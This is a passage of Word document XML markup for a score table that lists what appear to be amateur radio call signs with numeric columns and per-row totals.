        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27FD807E"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="433731F3"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70</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="4171A6BA" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E96246F"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KD8MSZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="410091A9"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DE0EA58"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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="488B05AA"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1865207B"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A9BBA5D"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43497E04"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75743F95"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07B8390F"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69</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="432991F2" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="401602D7"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K3AUX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2777C0B5"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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3828A7FC"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38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0AC14C49"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="349848EA"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5131FBEB"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="059A4815"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0ACBFBB7"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E8443CB"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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="2F3EF1F8" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CD0CA88"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KE8ANW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60F6802C"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B9FFDBC"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73D608C2"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="751AF73B"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="268B7CE9"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5043AE77"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F88F16F"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53A2FFDF"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48</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="24B6B110" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1CD57669"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KD8UOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="442C6047"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75765E3A"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5909E07D"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6AF5FA58"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7991E120"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C767CD6"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18A01375"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="501730C4"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46</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="3615E88C" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FB36ED5"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K8OVO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71AFA7CF"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AC5A682"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B91C23D"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71D55F1F"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21AF149C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54B67153"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76265005"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36D8CBF9"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43</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="38987C94" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01871B94"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NC8V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3739B2A4"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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3B87080F"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="464CFB85"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1259EF84"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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F465866"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68B9F26E"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="40965AB3"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63225EB7" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="29A3DD1C" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CF01B66" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3257E588" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
